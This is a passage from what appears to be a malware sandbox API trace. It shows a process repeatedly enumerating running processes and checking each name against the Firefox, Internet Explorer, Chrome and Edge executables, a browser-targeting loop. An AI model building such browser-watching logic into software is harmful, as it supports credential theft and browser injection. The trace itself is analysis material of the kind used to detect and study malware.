(lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.419] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.419] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0183.419] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0183.419] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.419] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.419] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.419] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.419] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.420] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.420] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.420] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.420] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.420] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.421] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.421] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.421] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0183.422] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0183.422] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0183.422] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0183.422] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0183.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0183.422] CloseHandle (hObject=0xd4) returned 1 [0183.422] Sleep (dwMilliseconds=0x3e8) [0184.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0184.434] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.434] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0184.434] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0184.434] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0184.434] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0184.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.435] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0184.435] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0184.435] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0184.435] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0184.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.435] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0184.435] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0184.435] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0184.435] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.436] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0184.436] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0184.436] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0184.436] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.436] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0184.436] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0184.436] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0184.437] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.437] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0184.437] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0184.437] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0184.437] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.438] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0184.438] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0184.438] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0184.438] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.438] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0184.438] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0184.438] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0184.438] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.439] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0184.439] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0184.439] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.440] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.441] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.442] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.442] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.442] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.442] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.442] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.443] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0184.443] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0184.443] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0184.443] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.443] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.443] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.443] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.443] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.444] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.444] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.444] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.444] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.444] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0184.444] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0184.444] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0184.444] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.445] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0184.445] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0184.445] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0184.445] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.445] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.445] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0184.445] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0184.445] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0184.445] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.445] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.446] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.446] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.446] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.446] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.446] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0184.447] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0184.447] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0184.447] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0184.447] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0184.447] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0184.447] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0184.447] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0184.448] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0184.448] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0184.448] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0184.448] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0184.448] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0184.448] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0184.448] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0184.448] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0184.449] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0184.449] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0184.449] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0184.449] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.449] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0184.449] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0184.449] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0184.450] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0184.450] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0184.450] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0184.450] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0184.450] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0184.450] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0184.451] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0184.451] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0184.451] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0184.451] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0184.451] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0184.451] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0184.451] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0184.451] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0184.452] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0184.452] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0184.452] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0184.452] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0184.452] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0184.452] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0184.452] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0184.452] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0184.453] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0184.453] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0184.453] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0184.453] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.453] Process32Next (in: hSnapshot=0xd4, 